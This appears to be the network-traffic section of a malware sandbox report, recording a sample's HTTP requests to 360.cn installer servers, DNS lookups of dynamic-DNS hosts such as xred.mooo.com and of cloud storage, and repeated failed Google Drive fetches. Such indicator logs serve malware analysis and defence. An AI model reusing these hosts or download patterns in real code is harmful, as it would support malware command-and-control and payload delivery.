                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=2282&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: global trafficDNS traffic detected: DNS query: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                      Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                      Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                      Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                                      Source: global trafficDNS traffic detected: DNS query: s.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: st.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: tr.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: agt.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: agd.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: pinst.360.cn
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6TKuRk0hgUk2Tb9kjOxkBIeSTsrnF1u8g4YV721yB-sW5Fz-CpvLZgaHxjghT7i1sgMsch1HMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:09 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UV5JMyfHuzI85Fe0L9FSmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=PHLPwFBV3nP3NSbmBNppx94wfdqPQl4Q-izB7Q9f0_bxaxWANYb1QcaTubhKjd2R6xySamhdnl-RYaDARyDu81yP1iK-V-e7E34pqVgPJwxEHcLMQ5b4PH3P0YYqID63fImAuLFJ1XTfSeu5RvIPc-V_WgPJ4D2Xww1UxfxNrV61NdVFmp2YgJg; expires=Tue, 01-Jul-2025 03:59:08 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ONYrnS6TaNGgqv6UdqQtrihFlHsGikp1VWLQsCFtZphjcPmmJJ0AVXQHzumzqY7pMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:09 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZCQ-PQ88OSpNFbRdm_0DlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ; expires=Tue, 01-Jul-2025 03:59:09 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KKxO_7hnrUA66jaVCwf6cCnVUhMMQNckVcM4eFLsoq5H9r_A_U427ivZsFvXySlDQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:10 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-wtj14MjPh4z9YXZaEgYoNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04; expires=Tue, 01-Jul-2025 03:59:10 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6RS07ST1kpU9kdRSvtDKk6c4oeW0W-6gvf9wushLh9ElqzmmZdWtjNyRS1YWlQZd1rContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:11 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Z2trGexnkfgVwHUKatiSEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5LtEz12ZHfeFdJ9-yQqYUnnwrOh5Y0vGEnBiTZhJGzPiovz0WHMkvHMpL--7_-CRd1L0riA1AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:12 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-dgYqnm3Mz9zkdy_Ewq9Dew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5TuCNmwWNgnO3Ttu6oyTnaLImnhSPrgxrURcHsDufdP4HkuKzkulSciAu0N-IOCIDeKCehem0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:12 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-0Rjrrj_fZBEpdGAtUYZu8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC772yqfX8Vr5PZ9SaTmSETjHJBgBiIW4lhiJ3m8XvdntdiNiMoKdtQtndz0ZVgXb28CContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1q2Qaz1c3vKaqdJrVWPd4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5mvV9VDPvfV3q3htwd_TzHuW1v6YcOl-HmwABmrmLmMrJN2BMZF-0_LSKkFwQa3hWOContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:13 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-NKTiXMR5I4kFECjrCqQ4iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6mqJwtfrff6dEMz2zdI-MZFVEfWBAi9ogwB5EJjBSR-kiKsOHS3hybyISElQzyj6YfFc8Zbf8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:15 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Hf0HhBYGkcFyoCnC1j0V8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yiLlsHAC2osUDoJ3wZEZkaT_Ww5dW-IkL58V0oCyHflEwfJXLeAYrp7Y76LcdbirVhiQI3ucContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:16 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Dh4VrrvCx2pVOWGDxtQUDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4RQLENhRrvzVqueDdzDHQpf4Jyu2yxE_Qp7ZHkhQmYZooQDyTlYdORTrkc-HnRm03KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:16 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-UMQ1vjRA9WsUbxq4ad4D_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cPH-EFvyhaaOG3jl0QVAJ7Aq--e6zYx6DNSk_4BnFzbgH6BhgII_ExjeKyJjFUGlcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:17 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce--3PEMSapH6wrPvKcz47n3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Tyqq2iivl5ayogLnwsjEQwiETwMCPrg0tfvhIPEHjcp24apnx8POGc7JaejbW7lkBeSN3jcYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4pfC2-T8JB2ftMNmFRl1Fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC57ASmcY3_x-w6N-6mQTarcIk-hNhj1KDdX-rorBkXaY7PKaOjjoR_QqUX3fcUjHu8pContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0JCCXqvhC6uJApwpKunyPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4AfqBtQhPbDtijPiqMfqPf3-ewQKuuRJT4qDXl2kTnRB4conf6QvA6x7XouugRuTP2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:20 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-c71R6bbShKLlj3qKxtpGyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4XSQo7gzj0xYJu4Wgsca2HKcfHtThZ2A4gPlYiV3c6BZ3NIoJwQyQYr9L9K7zdN5QRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-T62Hbi0Abpa532f4bk3vDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
